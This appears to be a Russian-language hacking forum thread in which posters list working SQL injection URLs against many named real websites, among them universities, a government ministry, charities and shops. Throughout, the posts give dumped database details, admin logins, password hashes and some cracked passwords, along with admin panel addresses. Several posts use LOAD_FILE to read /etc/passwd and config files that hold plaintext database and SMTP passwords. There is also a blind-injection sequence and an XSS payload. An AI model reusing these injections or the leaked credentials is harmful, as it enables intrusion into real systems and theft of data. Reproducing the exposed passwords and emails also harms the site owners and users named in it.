http://map.rin.ru/cgi-bin/main.pl?Region=-adig'+union+select+1,2,3,4,concat_ws(0x3a,database (),user(),version()),6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24+--+
юзер - postcards@192.168.1.13
бд - map
версия mysql - 4.1.22-log

http://lib.rin.ru/cgi-bin/new.pl?art=-2854'+union+select+concat_ws(0x3a,database(),user( ),version()),2,3--+
юзер - postcards@192.168.1.13
бд - lib
версия mysql - 4.1.22-log

http://zakon.rin.ru/cgi-bin/view.pl?id=-722+union+select+concat_ws(0x3a,user(),database(), version())+--+&midr=721
юзер - postcards@192.168.1.13
бд - zakon
версия mysql - 4.1.20

http://wallpapers.rin.ru/cgi-bin/screen.pl?id=-33'+union+select+concat_ws(0x3a,user(),database(), version()),2,3,4,5,6+--+
юзер - postcards@192.168.1.233
бд - wallpapers
версия mysql - 4.1.20

http://topgun.rin.ru/cgi-bin/trash.pl?mode=show&unit=-10858+union+select+1,concat_ws(0x3a,user(),databas e(),version()),3,4,5+--+
user - postcards@192.168.1.13
бд - topgun
версия mysql - 4.1.22-log

http://russians.rin.ru/cgi-bin/rus/view.pl?a=fa&id=999994343+union+select+1,2,concat_ws(0x3a,user( ),database(),version()),4,5,6,7,8,9,10,11+--+&idr=409&n=
юзер - postcards@192.168.1.13
бд - russians1
версия mysql - 4.1.22-log

http://www.discoverytravel.ru/next.php?pid=-1337 union select table_name from information_schema.columns where table_name --
http://www.sport-gym.ru/next.php?pid=-3%20union%20select%20group_concat(table_name),2%20 from%20information_schema.tables--

http://kazan.ws/cgi-bin/people/print.pl?action=sub&id_sub=-67+union+select+1,2,3,4,concat_ws(0x26,user(),data base(),version(),LOAD_FILE('/etc/passwd')),6,7,8,9,10,11,12,13,14--&id_razdel=7&wh=razd

http://elv.ee/next.php?lang=2&id=-5%20union%20select%201,version(),3,4,5,6%20--

http://www.volier.ru/l2.php?n=-1%20union%20select%201,2,version(),4--

http://www.hotel-cota1400.ro/render.php?page=100'+UNION+SELECT+AES_DECRYPT(AES_ ENCRYPT(CONCAT(Version(),Database(),User()),0x71), 0x71),2,3,4,5,6,7/*

Version: 4.1.22-standard-log
Databse: hotelco_public
User: hotelco_cota1400@localhost

http://elv.ee/next.php?lang=2&id=-5%20union%20select%201,version(),3,4,5,6%20--


user: d7775sa9187
host: z132.zone.ee
version: 5.0.67-log
db: d7775sd5376


http://www.volier.ru/l2.php?n=-1%20union%20select%201,2,version(),4--

vesion: 4.1.20
user:volierru@localhost
db:volierru

http://www.eimearquinn.com/shop.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,Num,Userna me,Password),7,8,9,10,11,12,13,14+from+admin_eq--
логин/пасс:
eimearquinn:ei989uin_eq
Так же пасивная XSS через скуль:

http://www.eimearquinn.com/shop.php?id=-1+union+select+1,2,3,4,5,<script>alert()</script>,7,8,9,10,11,12,13,14+from+admin_eq--
-----------------------------------------------
The End!

PR 7

http://ed.stanford.edu/suse/faculty/displayFacultyNews.php?tablename=notify1&id=-833+union+select+1,column_name,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from +information_schema.columns+where+table_name=(0x75 736572)+limit+3,1--

PR: 5
http://www.chicagoloopalliance.com/about.php?id=-193+union+select+1,2/*
PR: 3
http://www.kss-windows.com/next.php?id=-22+union+select+1,2/*

http://www.hqcomputers.ro/produs_detalii.php?id_produs=-829+union+select+1,2,3,concat_ws(0x3a,version(),da tabase(),user()),5,6,7,8,9,0,1,2,3,4,5,6/*&nume_produs=Imprimanta%20HP%20Color%20Laserjet%202 605

Database Version: 4.1.22-standard-log
Database name: hqcomputers_ro_bdmag
User name: 11255hqc@localhost

админка
http://hqcomputers.ro/admin/login.php

табелки не подбирал.

Pr 6
http://www.lib.odu.edu/libassist/guide/guide.php?id=-44+union+select+1,2,version(),4,5,6,7,8,9--
5.0.38-Ubuntu_0ubuntu1.4-log

Ministry of Chittagong Hill Tracts Affairs

http://www.mochta.gov.bd/news_events.php?page_id=5&CATEGORY=1+and+1+union+select+1,concat_ws(0x20,use rname,password,user(),database(),@@version),3,4,1, 6,7,8,9,10,11+from+tbl_user_access--


[admin panel] http://www.mochta.gov.bd/adminfiles/index.php
username: admin
password: mo7bu53

Database version: 5.0.67-community
Database name: mochtag_cht
User name: mochtag_root@localhost

http://www.businessinsurance.com/cgi-bin/article.pl?articleId=-26853+union+select+concat_ws(0x3a,user,password,ho st,file_priv),concat_ws(0x3a,user(),version(),data base()),3,4,5,6,7,load_file('/etc/passwd'),9,10,11,12+from+mysql.user--

PR6

Ни админки, ни путей я не нашел, походу база данных и веб сервер на разных хостах находятся.. или хз чо..
Если что у кого выйдет - отпишись в личку хотя бы)

http://www.yourprops.com/view_item.php?movie_prop=5179879820+union+select+1 ,2,3,concat_ws(0x3a,version(),user(),database()),5 ,6,7,8,9,10,11,12,13,14,15,16,17--


Database Version: 5.0.27
Database name: yourprops
User name: admin@localhost


http://www.yourprops.com/view_item.php?movie_prop=5179879820+union+select+1 ,2,3,concat_ws(0x3a,user,password),5,6,7,8,9,10,11 ,12,13,14,15,16,17+from+mysql.user+limit+0,1--

admin : 6632bfb46db6d97e
pma_IiabUsiU1n6q : 6c4572a01bdfb70d
horde : 039b58f6547b38c2
pma_g5Dqcuu61ikC : 60fb772f4a1fa923
pma_AVMLiZ09j6Cb : 05e06de46f9baae2
yourprops : 6632bfb46db6d97e


Читаем /etc/httpd/cpnf/httpd.conf


http://www.yourprops.com/view_item.php?movie_prop=5179879820+UNION+SELECT+1 ,2,3,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,LOAD_FILE (0x2F6574632F68747470642F636F6E662F68747470642E636 F6E66),0x3a),0x71),0x71),5,6,7,8,9,10,11,12,13,14, 15,16,17--





PageRank 7

http://www.njstatelib.org/News/news_item.php?item_id=117987911+union+select+1,2,c oncat_ws(0x3a,version(),user(),database()),4,5,6,7 ,8--


Database Version: 5.0.45
Database name: wwwnews
User name: njsl_guest@localhost

Админчег


http://www.njstatelib.org/News/news_item.php?item_id=117987911+UNION+SELECT+1,2,C ONCAT(0x3a,(SELECT+CONCAT(adminid,0x3a,username,0x 3a,password,0x3a,tablename)+FROM+wwwuser.admin+LIM IT+0,1),0x3a),4,5,6,7,8--

: 1 : rcampbell : d00key : all



PageRank 7

http://www.roamsecure.net/pressitem.php?news_id=287687767869+union+select+1, 2,3,4,5,6,concat_ws(0x3a,version(),user(),database ()),8,9,10--


Version:5.0.45
User:wsusr@localhost
Database:roamsecure



http://www.ditzdesigns.com/products/item.php?c=13+union+select+1,2,3,concat_ws(0x3a,ve rsion(),user(),database()),5,6,7,8,9,10--

Database Version: 5.0.21-community-nt
Database name: henhouse
User name: chicken@localhost

Админ


http://www.ditzdesigns.com/products/item.php?c=13+UNION+SELECT+1,2,3,AES_DECRYPT(AES_E NCRYPT(CONCAT(0x3a,(SELECT+CONCAT(user,0x3a,passwo rd)+FROM+henhouse.admin+LIMIT+1,1),0x3a),0x71),0x7 1),5,6,7,8,9,10--

admin : password


https://www.found412.com/item.php?merch_id=1180987678+union+select+1,concat _ws(0x3a,version(),user(),database()),3,4,5,6,7,8, 9,10,11,12,13--

4.1.22
found412@localhost
found412_com


http://etd.lib.montana.edu/etd/view/item.php?id=456/**/union/**/select/**/1,2,3,4,concat_ws(0x3a,version(),user(),database() )--


Version:4.1.22-log
User:etd_edit@localhost
Database:etd

http://www.miracol.ro/carte.php?carte=-99+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1, 2,3--&titlu=Autoinstruire%20in%20parapsihologie


Version: 5.0.67-community-log
Database: :miracol_miracol
User :miracol_miracol@localhost

PageRank 6

http://gorillafund.org/conservation/fieldnews_item.php?recordID=997867980+union+select +1,2,3,4,5,6,concat_ws(0x3a,version(),user(),datab ase()),8,9,10,11,12,13,14--

Database Version: 4.1.20
Database name: gorilla
User name: gorillaf_db@localhost


http://gorillafund.org/conservation/fieldnews_item.php?recordID=997867980+union+select +1,2,3,4,5,6,concat_ws(0x3a,user),8,9,10,11,12,13, 14+from+mysql.user+limit+0,1--

admin:7616b862045281be хэш MySQL:7616b862045281be: *test1234
pma_KOSkwHg4RA6O:5685eb1e1d67adf1
horde:6651c48b35b24923
jeff:413a5fe87cbf1d47
gorillaf_db:0dabc23b146d3b17 хэш MySQL:0dabc23b146d3b17: digit

PageRank: 6

http://www.sa-venues.com/explore/frontlineafrica/itinerary.php?id=-150+union+select+concat(user,0x3a,password),2,3,4

,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24+from+mysql.user--

http://www.sa-venues.com/admin/

root:*34D244FE504DCCF2C76FE6089242805D0ADC267A

Database Version: 4.1.14-nt
Database name: yokel33
User name: root@COUSINS.rch.onsite.hosting.co.za

http://www.jouanel.com/choix.php?lng=5&parent=-5+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),data base(),user()),5--

Database Version: 5.0.32-Debian_7etch6-log
Database name: jouanel
User name: jouanel@85.14.138.117


сайт тоже румынский

админка
www.jouanel.com/admin/
еще интересно вот тут
www.jouanel.com/admin.back/

PageRank: 5

http://www.ethaicd.com/show.php?pid=-43445+union+select+1,concat_ws(0x3a,username,passw ord),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24+from+adminname--

ethaicdsecure:d^hxbjowrR^ipN0760

Database Version: 5.0.45
Database name: ethaicd
User name: ethaicd@localhost


PageRank: 5

http://www.olomouc-guide.com/eng/index.php?dir_id=-456+union+select+concat_ws(0x3a,name,password)+fro m+_olomoucguide_admin_users--

вывод в шапке

admin:admin

Database Version: 5.0.51a-3ubuntu5.4-log
Database name: olomoucgui
User name: olomoucgui@uvirt15.active24.cz

http://www.vaccin.ro/index.php?s=6&p=-13+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6--

Database Version: 4.1.22-log
Database name: vaccin
User name: vaccinuser@localhost

http://www.cloudsat.cira.colostate.edu/dpcstatusNewsItem.php?newsid=298098760+UNION+SELEC T+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,Vers ion(),0x3a,Database(),0x3a,User(),0x3a),0x71),0x71 )--


Database Version: 4.1.10a-nt-log
Database name: omicron
User name: aims@www.cloudsat.cira.colostate.edu





http://www.pylones-usa.com/pylones/product.php?product=428098097+union+select+1,conca t_ws(0x3a,version(),user(),database()),3,4,5,6,7,8--&category=2

Database Version: 4.1.22-standard
Database name: sarut
User name: hostsaru@localhost


http://www.pylones-usa.com/pylones/product.php?product=428098097+union+select+1,conca t_ws(0x3a,user,password),3,4,5,6,7,8+from+mysql.us er--&category=2


root : *64AA67B0A3F7FBAFE6E4C07862C61EE66AFE40E6

PageRank: 5

http://www.jkcement.com/HTML/management.php?dir_id=12&type=-1+union+select+1,2,concat_ws(0x3a,user_login,user_ password),4,5,6+from+admin_users--

admin:0429d0a901e5afb487e88c8fc2a95f17:billclinton

Database Version: 5.0.51a-community
Database name: jkcement_newjkcement
User name: jkcement_newjk@localhost

http://www.abi-trade.ru/memory.php?id=-315%20union%20select%20version(),2,3,4--

Седня нефига не рыбный день, один сайт всего за 3 часа.. Ужос =)

http://firme.dingalati.ro/firme/347/index.php?id=8+union+select+1,concat_ws(0x3a,versi on(),user(),database()),3

Database Version: 5.0.37-standard
Database name: dingalati_firme
User name: dingalati_cis@localhost


http://firme.dingalati.ro/firme/347/index.php?id=8+union+select+1,concat_ws(0x3a,usern ame,password,email_address),3+from+dingalati_ads.o x_users

compitserv:c478d1475034678fb22684a7443cd04f:office @compitserv.com


http://firme.dingalati.ro/firme/347/index.php?id=8+union+select+1,concat_ws(0x3a,user_ login,user_nicename,user_pass,user_email),3+from+d ingalati_apg.wp_users


admin:$P$BFljCZY9nDTLPm9Ey5C2SFJxMMp8qw.:admin:a@a .ro
Viorel:$P$BpftK2RsBOon8wGBgJRxy2tFr9PvRG/:viorel:viorel_gl@yahoo.com

Hosting / Indonesia

PageRank: 3

http://www.solindohost.com/faq.php?type_id=-6+union+select+1,2,3,groupconcat(username,0x3a,pas sword),5,6,7,8+from+solindohost_admin--

http://www.solindohost.com/admin

root:root
webmaster:solindohost2005
user:passwd

Database Version: solindoh_solindoh
Database name: 5.0.67-community
User name: solindoh_newslh@localhost

https://secure.netsolhost.com/00f2e0b.netsolhost.com/aupcal2/form.php?id=879887988+union+select+1,2,3,4,5,6,7,8 ,9,10,11,12,13,14,15,concat_ws(0x3a,version(),user (),database()),17,18,19,20,21,22,23,24,25,26--&calendar_id=43

Database Version: 4.1.21
Database name: aupcalendar
User name: acandia2007@205.178.145.65

/data/11/1/73/148/1073963/user/1112542/htdocs/aupcal2/form.php


Читаем /etc/passwd



https://secure.netsolhost.com/00f2e0b.netsolhost.com/aupcal2/form.php?id=879887988+UNION+SELECT+1,2,3,4,5,6,7,8 ,9,10,11,12,13,14,15,AES_DECRYPT(AES_ENCRYPT(CONCA T(0x3a,LOAD_FILE(0x2F6574632F706173737764),0x3a),0 x71),0x71),17,18,19,20,21,22,23,24,25,26--


Читаем /data/11/1/73/148/1073963/user/1112542/htdocs/aupcal2/cfg/config.php

https://secure.netsolhost.com/00f2e0b.netsolhost.com/aupcal2/form.php?id=879887988+UNION+SELECT+1,2,3,4,5,6,7,8 ,9,10,11,12,13,14,15,AES_DECRYPT(AES_ENCRYPT(CONCA T(0x3a,LOAD_FILE(0x2F646174612F31312F312F37332F313 4382F313037333936332F757365722F313131323534322F687 4646F63732F61757063616C322F6366672F636F6E6669672E7 06870),0x3a),0x71),0x71),17,18,19,20,21,22,23,24,2 5,26--

Получаем

include_once("phpself_scriptname.fix.php");
define("dbname","aupcalendar");
define("hostname","205.178.146.23");
define("username","acandia2007");
define("password","AUPcal2007a");
define("smtpuser","acandia");
define("smtppass","paris");
define("mail","candia@aup.fr");
define("adm_mail","candia@aup.fr");
define("TEMPLATE_PATH","template");
define("date_of_install","2007-11-11");


Заходим в PHPMYADMIN

http://205.178.146.23/


логин Admin пароль acandia2007b

Админка

https://secure.netsolhost.com/00f2e0b.netsolhost.com/aupcal2/admin.php

http://www.kstore.ro/index.php?opt=showall&grup=-8+union+select+1,concat_ws(0x3a,version(),database (),user()),3--


Database Version: 5.0.67-community
Database name: kstorer_kstore
User name: kstorer_kstore@localhost

http://www.kstore.ro/index.php?opt=showall&grup=-8+union+select+1,concat_ws(0x3a,username,password) ,3+from+admins--

ralumihai:bdb8c008fa551ba75f8481963f2201da: tutu
админка
http://www.kstore.ro/admin/

http://www.aui.edu/pr.php?id=-20071110%27+union+select+1,2,3,4,5,convert(version ()+using+latin1),7,8,9,10,11,12,13,14/*

4.1.18-standard-log

PR: 7

\\ээм, у меня поиск не работет

http://www.comunitati.net/no_login/index.php?modul=comunitati&categ=orase&id_tara=-6+union+select+1,concat_ws(0x3a,version(),database (),user()),3/*


Version: 4.0.27-max-log
Database: paulstaicu
User: paulstaicu@68.178.254.5

PR6

http://www.coa.gatech.edu/id/event.php?id=-3736+union+select++1,2,3,4,5,concat(pw,0x3a,userna me),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,26,27,28,29,30,31,32+from+user_logins+wher e+ID=1--

Если кто найдет админку куда подйдет логин и пасс- дайте знать, плиз. =)
+
UPD

http://www2.ric.edu/news/displayNews.php?id=news-99999+union+select+concat(Username,0x3a,Password), 2,3,4,5,6+from+int_users--

cberube:rainbow

http://www2.ric.edu/admin/

PR6

http://www.coa.gatech.edu/id/event.php?id=-3736+union+select++1,2,3,4,5,concat(pw,0x3a,userna me),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,26,27,28,29,30,31,32+from+user_logins+wher e+ID=1--

Если кто найдет админку куда подйдет логин и пасс- дайте знать, плиз. =)

По всей видимости пассы от галлереи, но она снесена, robots.txt тебе в руки.
Не совсем то, но

http://www.coa.gatech.edu/id/event.php?id=-3736+union+select++1,2,3,4,5,group_concat(concat_w s(0x3A,option_name,option_value)+SEPARATOR+0x3c627 23e),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32+from+blogs.wp_presid ent_options--

http://www.gatech.edu/blogs/president - wp(6.3)
www.gatech.edu PageRank: 8 тИЦ: 850

вот юзеры

http://www.coa.gatech.edu/id/event.php?id=-3736+union+select++1,2,3,4,5,group_concat(concat(u ser_pass,0x3A,user_login,0x3c62723e)),7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32+from+blogs.wp_president_users--

$P$BTtoA2y6jOaVJGW3ImqzvO7tpPsqwg1:admin
$P$BWlRTtFjpvji9sdoeZwxi/OG9a9iUe.:bryan
$P$BKkhNwEyoo5vKYR54gIbnV9qFkMe4v0:michael
хотя учитывая что в wp новых версий ну очень трудно побрутить хеш то это безсмыслено.

http://www.star-storage.ro/produse_detalii.asp?ID=11[SQL]

Version: 5.0.51a-community-nt
DataBase: star-storage
User: star-storage@localhost


Впервые встретил такую связку ASP+MySQL, гибрид.Поля выводимые не нашел, вывел все брутом, есть таблица users с колонками: UserName, password, user, parola.

админка
www.star-storage.ro/admin
юзеров не брутил..времени и желания нет, кто хочет поковырятся ...вперёд. Удачи.


З.Ы. Jokester извини за бояны.. моя ошибка

http://www.grothcorp.com/product.php?ID=9691379876+union+select+1,2,3,4,5,6 ,7,8,9,concat_ws(0x3a,version(),user(),database()) ,11,12,13,14,15,16,17,18,19,20,21,22,23,24--&category=7&series=153

Database Version:4.0.18
User name:groth@localhost
Database name:groth


http://www.bragada.com/product.php?&id=138098097656+union+select+concat_ws(0x3a,versio n(),user(),database()),2,3,4,5,6,7,8,9--&fid=1

Database Version:4.1.22-standard
User name:bragada_ebed@localhost
Database name:bragada_ebed


http://www.thejazzcorner.com/cd-profile.php?ID=13687687545+union+select+1,2,concat _ws(0x3a,version(),user(),database()),4,5,6,7,8,9, 10--

Database Version:4.1.22-log
User name:ceke9mzd9e@localhost
Database name:live_jazz



http://www.ourvarsity.com/school-article-profile.php?School_ID=0&Article_ID=18176875587+union+select+1,2,3,4,5,6,7, 8,9,concat_ws(0x3a,version(),user(),database()),11 ,12,13,14,15--


Database Version: 5.0.67-log
Database name: varsity_data
User name: varsity_user@localhost

RP5

http://www.mmsa.org/events/detail.php?id=-1+union+select+1,concat(username,0x3a,password),3, 4,5,6,Database(),8,9,0,1,12,3,4,5,6,7,8,9,0,1,22,3 ,4,5,6,7,8,9,0,1,32,3,4,5,6,7,8,9,0,41+from+user+l imit+0,1--
turner:fooBar
mmsa:slazNEL

4.1.22-standard
mmsa_mmsa@localhost
mmsa_mmsa

********************************************

PR4

http://www.veeteedinein.co.uk/recipe_more.php?id=-1+union+select+1,concat(username,0x3a,password),3, 4,5+from+tbl_user--

Database Version: 5.0.45
Database name: veeteecom
User name: veeteecom@localhost

Админка:
http://www.veeteedinein.co.uk/admin/
admin1:u#ddaa!212@mmcom

http://sports.yourspace.nuigalway.ie/clubs/club_profile.php?id=-102+union+select+user()--
Dbname: sports
Version: 5.0.51a-3ubuntu5.4-log
Username: sports@localhost
около 57 таблиц.

http://www.rfrap.ru Сайт Ростовского филиала Российской академии правосудия=)

юзер:
http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(use r(),1,1)))=114 r
http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(use r(),2,1)))=102 f
http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(use r(),3,1)))=114 r
http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(use r(),4,1)))=97 a
http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(use r(),5,1)))=112 p
http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(use r(),6,1)))=64 @
http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(use r(),7,1)))=108 l
http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(use r(),8,1)))=111 o
http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(use r(),9,1)))=99 c
http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(use r(),10,1)))=97 a
http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(use r(),11,1)))=108 l
http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(use r(),12,1)))=104 h
http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(use r(),13,1)))=111 o
http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(use r(),14,1)))=115 s
http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(use r(),15,1)))=116 t
http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(use r(),16,1)))=0

бд
http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(dat abase(),1,1)))=114 r
http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(dat abase(),2,1)))=102 f
http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(dat abase(),3,1)))=114 r
http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(dat abase(),4,1)))=97 a
http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(dat abase(),5,1)))=112 p
http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(dat abase(),6,1)))=0

версия mysql
http://www.rfrap.ru/site/index.php?newsfull=3+and+substring(version(),1,1)= 3 3
http://www.rfrap.ru/site/index.php?newsfull=3+and+substring(version(),2,1)= 0 0
http://www.rfrap.ru/site/index.php?newsfull=3+and+substring(version(),3,1)= 2 2
http://www.rfrap.ru/site/index.php?newsfull=3+and+substring(version(),4,1)= 3 3

P.S. Простите, что так много=)
P.P.S. Уффф=)

http://www.bancuri.biz/bancuri.php?id_categ=-111+UNION+SELECT+1,concat_ws(0x3a,version(),databa se(),user()),3--

Version: 5.0.51a-log
Database: :bancuri_biz_bd
User :mica@192.168.88.2



http://bancuri.biz/admin
User: Adrian
Pass: 111222

read /etc/passwd

http://www.bancuri.biz/bancuri.php?id_categ=-111+UNION+SELECT+1,LOAD_FILE(0x2F6574632F706173737 764),3--

http://www.photo-kazan.ru

http://www.photo-kazan.ru/gallery/summer.html?users_id=-26'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,con cat(version(),0x3a,database()),user(),16,17,18+fro m+admin_groups+--+

юзер - photokazan_site@localhost
бд - photokazan_site
версия бд - 5.0.67-community-log

http://www.photo-kazan.ru/gallery/summer.html?users_id=-26'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,con cat_ws(0x3a,id,login,pass),15,16,17,18+from+admin_ groups+--+

логин админа - admin
пароль - 123 =))))))
вот админка - http://www.photo-kazan.ru/admin

P.S. КАКОЙ ПРИДУРОК ЗАДЕФЕЙСИЛ САЙТ? ОБРАЩАЮСЬ К ПРИДУРКУ ЗАДЕФЕЙСИВШЕМУ САЙТ:
ВО ПЕРВЫХ ЭТО ТВОЙ САЙТ, ЧТО БЫ НАД НИМ ТАК ИЗДЕВАТЬСЯ?
ВО ВТОРЫХ ПОДПИСЫВАТЬСЯ HACKED BY X-@fqan ! ЗАХОДЯ С АККАУНТА АДМИНА ЭТО ПРОСТО СМЕШНО) ТЕМ БОЛЕЕ УЯЗВИМОСТЬ НАШЕЛ НЕ ТЫ.
В ТРЕТЬИХ НА АНТИЧАТЕ СОВСЕМ НЕ ОДОБРЯТЬСЯ ДЕФЕЙСИТЬ САЙТЫ!!!
В ЧЕТВЕРТЫХ Я НЕ ВЗЛАМЫВАЛ ЭТОТ САЙТ, А НАШЕЛ УЯЗВИМОСТЬ!

PR3

http://www.recentnews.co.uk/news2.php?id=-1+union+select+1,2,3,concat(admin_name,0x3a,admin_ password),5,6,7,8,9,10,11+from+admin+limit+0,1--

alex:946d20c91f154795805cebdefe919ef7 alex1

Database Version: 4.1.22-standard
Database name: recentne_recent2
User name: recentne_recentn@localhost

http://www.protectiacopilului6.ro/document.php?doc=-19+UNION+SELECT+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6,7,8,9--

Version: 5.0.51a-log
Database: protectiacopilului6_ro_db
User:dgaspc6@192.168.88.2


Read my.cnf, also can read /etc/passwd

http://www.protectiacopilului6.ro/document.php?doc=-19+UNION+SELECT+1,2,LOAD_FILE(0x2F6574632F6D792E63 6E66),4,5,6,7,8,9--

http://takafol.ru/news.php?g=0+union+select+1,2,concat_ws(0x3a,datab ase(),user(),version()),4,5,6+--+;&page=5

бд - db_takafol
юзер - takafol@localhost
версия бд - 4.0.23-standard

http://www.eurasica.ru/articles/-kazakh'+union+select+1,2,concat_ws(0x3a,database() ,user(),version()),4,5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22+--+/

бд - kyrgyz2_eurasica
юзер - kyrgyz2_eurasica@localhost
версия бд - 4.1.22-log

rp3

http://www.fireplaceworld.co.uk/package.php?name=The%20Adam%20Sambro%20Electric%20 Suite&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20/*

Database Version: 5.0.45
Database name: endeva
User name: tom@localhost


Из базы можно вытянуть пароли из базы bebeamour (www.bebeamour.co.uk - pr3):
http://www.fireplaceworld.co.uk/package.php?name=The%20Adam%20Sambro%20Electric%20 Suite&id=-1+union+select+1,2,3,concat(username,0x3a,password ),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+ bebeamour.users/*
bebeamor:dream13dust


из базы e107: (e107.org - PR7 2002 г)
http://www.fireplaceworld.co.uk/package.php?name=The%20Adam%20Sambro%20Electric%20 Suite&id=-1+union+select+1,2,3,concat(user_loginname,0x3a,us er_password),5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20+from+e107.e107_user/*
administrator:a2259f7acbf0b601de00543ccb59ef6e
Админку можно найти введя в поиск сайта "administrator"
В куках пасс md5(md5(pass)), значит a2259f7acbf0b601de00543ccb59ef6e превращаем в 80636326bb61acaa05911fc3bc1458ca, добавим ID и... в общем это только при поверхностном просмотре, а так сами копайте.


и на последок:
http://www.stand4av.co.uk/catalogue.php?id=-1+union+select+1,concat(username,0x3a,pass),3,4,5, 6,7,8+from+login+limit+0,1--

Database Version: 4.1.21-log
Database name: cheapelectric
User name: cheap@localhost

http://www.stand4av.co.uk/login.php

немного расшифрованных пассов...
greg:jimi55
del:eminem
Paull:123456
blaise:summer
mjaggard:Philip

http://www.smarterguys.com/view-item.php?id=1279895789+union+select+1,concat_ws(0x 3a,version(),user(),database()),3,4,5,6,7,8--

Database Version: 5.0.45-log
Database name: smarterguys_cms
User name: smarterguys_cms@192.168.0.64


http://www.smarterguys.com/view-item.php?id=1279895789+UNION+SELECT+1,CONCAT(0x3a, (SELECT+CONCAT(username,0x3a,password,0x3a,email)+ FROM+smarterguys_cms.PortalUsers+LIMIT+1,1),0x3a), 3,4,5,6,7,8--

: timmd909 : clocke : tim@timmd909.dyndns.org
: maxx : gramax : mitchell@smarterguys.com


http://www.heerys.com/product-detail.php?productID=16768768759+union+select+1,2, 3,4,5,6,concat_ws(0x3a,version(),user(),database() ),8,9,10,11,12,13,14,15,16,17,18--&ID=11&type=

Database Version:4.1.22-log
User name:bq83845zb3@localhost
Database name:heerys_live


http://www.darkauction.com/product_desc.php?id=3444179865+union+select+1,2,co ncat_ws(0x3a,version(),user(),database()),4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28,29,30,31,32,33,34,35--

Database Version:4.1.22-max-log
User name:scottjking@208.109.78.133
Database name:scottjking


http://ddcnyc.com/product.php?id=366937809809877+union+select+1,2,3, 4,5,concat_ws(0x3a,version(),user(),database()),7, 8,9,10,11,12,13,14,15,16--&cat=bed&subcat=bedroom%20furniture

Database Version: 5.0.51a-community
Database name: ddc_ddcnyccomdev
User name: ddc_ddc@localhost


http://www.chinmayapublication.com/dept.php?id=168768993+UNION+SELECT+AES_DECRYPT(AES _ENCRYPT(CONCAT(0x3a,Version(),0x3a,Database(),0x3 a,User(),0x3a),0x71),0x71),2,3,4,5,6,7--

Database Version: 4.1.14
Database name: CPublications
User name: siddhaji@localhost

PR4

http://www.meaningfulmedia.org/about.php?id=-1+union+select+1,2,concat(user,0x3a,password),4,5, 6,7,8,9,10,11,12,13,14+from+mysql.user+limit+0,1--

Database Version: 5.0.51a-3ubuntu5.1
Database name: cms_data
User name: cms_data@localhost

http://www.meaningfulmedia.org/admin

debian-sys-maint:BB5CBC11A4D20B437E36051F151BA57BAD97B3BF
admin:627EAE5E81037806F9DE339F02C9C85D10371D51
pma_wOLLhjqYnwwF:B7DF9030E224B44878D02C2BDA5288F81 5DA29AF
horde:92F55D68BBED49E0DF482D437351073D52189ACD
cms_data:52F22AAB2B081A315B8A05AAD32623B56C19962B

Еще одна компания сильная...

http://www.dicksondata.com/misc/glossary.php?id=13997987+union+select+1,2,concat_w s(0x3a,version(),user(),database()),4--

Database Version: 5.0.51a-log
Database name: dicksondata_content
User name: dicksondata@10.1.1.42


http://www.dicksondata.com/misc/glossary.php?id=13997987+UNION+SELECT+1,2,AES_DECR YPT(AES_ENCRYPT(CONCAT(0x3a,(SELECT+CONCAT(Usernam e,0x3a,Password,0x3a,Email)+FROM+dicksondata_user. tUser+LIMIT+4,1),0x3a),0x71),0x71),4--

:admin:34f816b089d7f7a6348b51bdc3290d6e : admin@tablexi.com
